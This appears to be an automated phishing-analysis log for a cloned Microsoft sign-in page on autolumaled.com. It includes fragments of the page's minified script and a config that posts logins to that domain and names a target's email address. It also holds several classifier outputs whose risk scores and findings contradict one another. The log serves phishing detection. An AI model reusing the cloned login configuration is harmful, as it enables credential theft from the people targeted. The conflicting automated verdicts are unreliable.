 * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.
 * 
 *   json2.js (2016-05-01)
 *   https://github.com/douglascrockford/JSON-js
 *   License: Public Domain
 * 
 * Provided for Informational Purposes Only
 * 
 * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------
 */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&u.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(c&&c(t);u.length;)u.shift()()}var n,r={},o={1:0};function i(t){if(r[t])return r[t].exports;var n=r[t]={i:t,l:!1,exports:{}};return e[t].call(n.exports,n,n.exports,i),n.l=!0,n.exports}Function.prototype.bind||(n=Array.prototype.slice,Function.prototype.bind=function(e){if("function"!=typeof this)throw new TypeError("Function.prototype.bind - what is trying to be bound is not callable");var t=n.call(arguments,1),r=t.length,o=this,i=function(){},a=function(){return t.length=r,t.push.apply(t,arguments),o.apply(i.prototype.isPrototypeOf(this)?this:e,t)};return this.prototype&&(i.prototype=this.prototype),a.prototype=new i,a}),document.head=document.head||document.getElementsByTagName("head")[0],function(){function e(t){var n=this,r=0,o=null,i=[];function a(){if(i.length>0){var e=i.slice();i=[],setTimeout((function(){for(var t=0,n=e.length;t<n;++t)e[t]()}),0)}}function s(e){0===r&&(o=e,r=1,a())}function u(e){0===r&&(o=e,r=2,a())}n.then=function(t,n){return new e((function(s,u){!function(t,n,s,u){i.push((function(){var i;try{i=1===r?"function"==typeof t?t(o):o:"function"==typeof n?n(o):o}catch(a){return void u(a)}i instanceof e?i.then(s,u):2===r&&"function"!=typeof n?u(i):s(i)})),0!==r&&a()}(t,n,s,u)}))},n["catch"]=function(e){return n.then(null,e)},function(){if("function"!=typeof t)throw new TypeError("Promise: argument is not a Function object");try{t(s,u)}catch(e){u(e)}}()}function t(e,t,n,r,o){return function(i){e[t]=r?i:o?{status:"fulfilled",value:i}:{status:"rejected",reason:i},n()}}function n(n,r){return n&&n.length?new e((function(o,i){for(var a=[],s=0,u=0,c=n.length;u<c;++u){var l=n[u];if(l instanceof e){s++;var d=function(){0==--s&&o(a)};r?l.then(t(a,u,d,r),i):l.then(t(a,u,d,r,!0),t(a,u,d,r,!1))}else a[u]=l}0===s&&setTimeout((function(){o(a)}),0)})):e.resolve([])}function r(e,t){return function(){e(t)}}e.all=function(e){return n(e,!0)},e.allSettled=function(e){return n(e,!1)},e.race=function(t){return new e((function(n,o){if(t&&t.length)for(var i=0,a=t.length;i<a;++i){var s=t[i];s instanceof e?s.then(n,o):setTimeout(r(n,s),0)}}))},e.reject=function(t){return new e((function(e,n){n(t)}))},e.resolve=function(t){return t instanceof e?t:t&&"function"==typeof t.then?new e((function(e,n){t.then(e,n)})):new e((function(e){e(t)}))},window.Promise||(window.Promise=e),window.Promise.all||(window.Promise.all=e.all),window.Promise.allSettled||(window.Promise.allSettled=e.allSettled),window.Promise.race||(window.Promise.race=e.race),window.Promise.reject||(window.Promise.reject=e.reject),window.Promise.resolve||(window.Promise.resolve=e.resolve)}(),i.e=function(e){var t=[],n=o[e];if(0!==n)if(n)t.push(n[2]);else{var r=new Promise((function(t,r){n=o[e]=[t,r]}));t.push(n[2]=r);var a=window.ServerData,s=a&&a.loader&&a.loader.cdnRoots||[],u=a&&a.slMaxRetry?a.slMaxRetry:s.length-1,c=new Error;var l=function d(t,n){var 

{
    "risk_score": 6,
    "reasoning": "The provided JavaScript snippet contains several behaviors that raise moderate security concerns, including:

1. External Data Transmission (+2 points): The script sends user data to the 'autolumaled.com' domain, which is not a known trusted domain.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be untrusted.
3. Aggressive DOM Manipulation (+2 points): The script appears to aggressively manipulate the DOM, which could indicate potential malicious activity.

While the script does not contain any high-risk indicators like dynamic code execution or obfuscated code, the combination of the moderate-risk behaviors and the use of potentially untrusted domains results in a medium risk score of 6. Further investigation may be warranted to determine the legitimacy and intended purpose of this script."
}

//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://autolumaled.com/aadcdn.msauth.net/~/shared/1.0/","urlDefaultFavicon":"https://autolumaled.com/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/authorize?client_id=00000002-0000-0ff1-ce00-000000000000\u0026redirect_uri=https%3a%2f%2fautolumaled.com%2fowa%2f\u0026resource=00000002-0000-0ff1-ce00-000000000000\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid\u0026msafed=1\u0026msaredir=1\u0026login_hint=misty.alnahaoi%40texanacenter.com\u0026client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026protectedtoken=true\u0026claims=%7b%22id_token%22%3a%7b%22xms_cc%22%3a%7b%22values%22%3a%5b%22CP1%22%5d%7d%7d%7d\u0026nononce=638725737240944157.7c370d18-7b0e-4e63-870c-dc1316649581\u0026state=DctBDsIgEEBR0LO4hA4wMHTReBQzUmJJWkiURHt7Wby_-1IIcR0ug4QRQcFFsp4cWYQZ0XjSlBzBaqKiJ2SFOTgVCZJak3EmBJx9NHK8dmpfnu57e5X62Erty1E-_dS8V964lRtCzz-unHLt-a1TO_4\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://autolumaled.com/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://autolumaled.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=948a9117-40b6-3473-9757-3f49bb917ffb\u0026origin=autolumaled.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fIsCiamUserFlowUxNewLogicEnabled":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fUseHighContrastDetectionMode":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"urlAcmaServerPath":"https://autolumaled.com/","sTenantId":"00000000-0000-0000-0000-000000000000","scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAABVrSpeuWamRam2jAF1XRQExb9dkYTSL7qrVfOBcgHs1hv2T-ymLAvRJPbTzeAfGR33TkCb371dZ_R6Hg3drKHvJAMtwvrqOp0JS06byYTsz2aVpKsNKRSP06_A4m-DcjhYsfMxc507RhDUE46dQrCE5AZV0zxaW5bOntHKq2h94URe2P2Tb4b1Tqk4va-go1Nke6ATEiC0R2rros6phgQfkYSIYhoris6_85_EHK_-WyAA","canary":"D95c+z90zLBZ0tf/YrUjKxM+9WbtYAc1Qa2r16C4t8Q=3:1:CANARY:A6xe+dfqiiRDjaO0Ml3+l2Nl5O+QQLLIgOcWUvZDiDY=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"948a9117-40b6-3473-9757-3f49bb917ffb","sessionId":"22c9d7b5-19de-4944-8cdf-03d0dc726300","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you i

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false,
    "reasoning": "This appears to be a straightforward commercial domain with a standard .com TLD. No suspicious elements are detected in the URL structure."
}

URL: https://autolumaled.com

```json
{
    "risk_score": 3,
    "reasoning": "The script primarily involves DOM manipulation and logging, with no high-risk indicators like dynamic code execution or data exfiltration. It uses legacy practices and tracking behavior, but these are not inherently malicious. The script appears to be a debugging or logging utility, which aligns with typical analytics or telemetry functionality."
}

//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+v.length).toLowerCase()===v}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("rickorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("xintegrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Cancel",
"text_input_field_labels": "unknown",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Sign in",
"text_input_field_labels": [
"Password"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "Microsoft"
  ]
}

{
  "brands": [
    "Microsoft"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The URL 'autolumaled.com' does not match the legitimate domain 'microsoft.com'.",    "The domain name 'autolumaled.com' does not contain any recognizable association with Microsoft.",    "The presence of a password input field on a non-Microsoft domain is suspicious.",    "The URL does not contain any recognizable Microsoft branding or subdomains."  ],  "riskscore": 9}
Google indexed: False